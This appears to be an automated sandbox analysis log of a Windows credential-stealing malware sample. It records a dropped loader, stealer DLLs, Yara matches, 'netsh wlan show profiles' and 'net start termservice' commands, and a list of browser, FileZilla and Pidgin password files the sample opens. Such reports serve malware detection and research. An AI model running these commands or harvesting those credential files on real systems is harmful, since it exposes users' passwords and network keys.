                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_003121E3 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_003121E3
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E61F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,0_2_002E61F0
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0031F06F _free,GetTimeZoneInformation,0_2_0031F06F
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E93D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_002E93D0

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: tOuVwTJrau.exe, type: SAMPLE
                        Source: Yara matchFile source: 12.2.rundll32.exe.6c050000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.6c050000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.2.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.tOuVwTJrau.exe.2e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.tOuVwTJrau.exe.2e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\VRxzJqAPkmesVXPaOqGhoiqbUmmLwIjcAZFkSvRlPGWvLVGgPHwdiIweEvzUF\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\VRxzJqAPkmesVXPaOqGhoiqbUmmLwIjcAZFkSvRlPGWvLVGgPHwdiIweEvzUF\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml

                        Remote Access Functionality

                        barindex
                        Source: tOuVwTJrau.exeString found in binary or memory: net start termservice
                        Source: tOuVwTJrau.exe, 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
                        Source: tOuVwTJrau.exe, 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT 